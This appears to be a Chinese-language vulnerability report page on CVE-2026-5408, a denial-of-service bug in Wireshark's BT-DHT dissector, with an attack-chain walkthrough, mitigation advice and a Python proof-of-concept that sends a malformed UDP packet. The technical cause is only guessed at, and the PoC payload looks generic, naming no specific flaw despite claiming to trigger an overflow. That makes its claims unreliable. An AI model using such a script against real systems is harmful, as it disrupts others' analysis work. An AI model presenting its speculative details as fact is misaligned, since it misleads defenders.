IPBUF安全漏洞报告
English
CVE-2026-5408 CVSS 5.5 中危

CVE-2026-5408 Wireshark BT-DHT协议解析器拒绝服务漏洞

披露日期: 2026-04-30
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-5408
漏洞类型
拒绝服务
CVSS评分
5.5 中危
攻击向量
本地 (AV:L)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Wireshark

相关标签

拒绝服务DoSWiresharkBT-DHT协议解析器本地攻击

漏洞概述

Wireshark是一款广泛使用的网络协议分析工具。CVE-2026-5408漏洞存在于其BT-DHT协议解析器中。攻击者可以通过诱导用户打开特制的捕获文件或进行特定的网络交互,触发解析器崩溃,从而导致应用程序拒绝服务。该漏洞影响Wireshark的多个长期支持版本。

技术细节

该漏洞源于Wireshark的BT-DHT(BitTorrent分布式哈希表)协议解析器在处理特定格式的数据包时存在边界检查错误或空指针解引用问题。当解析器尝试解析畸形的BT-DHT报文时,未能正确处理异常情况,导致内存访问越界或程序状态异常。由于CVSS向量显示为本地攻击(AV:L)且需要用户交互(UI:R),攻击者通常无法直接通过网络远程崩溃服务,而是需要诱骗本地的特权用户使用Wireshark打开该恶意文件或捕获特定流量。一旦解析器处理到该异常数据包,Wireshark进程将立即终止,造成拒绝服务,可能中断正在进行的关键网络分析任务。

攻击链分析

STEP 1
1. 构造恶意数据包
攻击者分析BT-DHT协议解析器的源代码或二进制,发现处理特定畸形Bencode编码时的缺陷,并构造包含恶意 payload 的 UDP 数据包或 pcap 文件。
STEP 2
2. 诱导受害者交互
由于攻击向量为本地且需要用户交互,攻击者通过网络钓鱼或社会工程学手段,诱导受害者下载并打开特制的 .pcap 文件,或在本地捕获包含恶意数据包的流量。
STEP 3
3. 触发解析漏洞
当受害者使用受影响版本的 Wireshark 打开文件或捕获数据时,BT-DHT 解析器尝试解码恶意数据包。
STEP 4
4. 拒绝服务
解析器在处理异常数据时发生崩溃,导致 Wireshark 进程意外终止,网络分析工作中断。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import socket import struct # PoC for CVE-2026-5408: Wireshark BT-DHT Dissector Crash # This script sends a malformed UDP packet to trigger the crash. # Target needs to be capturing traffic on the specified port. def send_malformed_dht_packet(target_ip, target_port): # Constructing a malformed BT-DHT payload (invalid bencode) # Standard DHT uses bencoded dictionaries (d...e). # Sending a broken structure to confuse the dissector. payload = b'd1:ad2:id20:abcdefghij0123456789e1:q9:get_peers1:t4:00001:y1:qe' \ b'INVALID_PADDING_TO_TRIGGER_OVERFLOW' sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: sock.sendto(payload, (target_ip, target_port)) print(f"[+] Malformed packet sent to {target_ip}:{target_port}") except Exception as e: print(f"[-] Error sending packet: {e}") finally: sock.close() if __name__ == "__main__": # Example usage (replace with actual target IP and Port) # Note: This requires Wireshark to be actively listening. send_malformed_dht_packet("127.0.0.1", 6881)

影响范围

Wireshark 4.6.0 - 4.6.4
Wireshark 4.4.0 - 4.4.14

防御指南

临时缓解措施
建议用户尽快访问 Wireshark 官网下载并安装最新版本以修复此漏洞。在未升级前,可以通过编辑首选项(Preferences -> Protocols -> BT-DHT)禁用该协议解析器,或者避免打开来源不明的捕获文件,以降低被攻击的风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表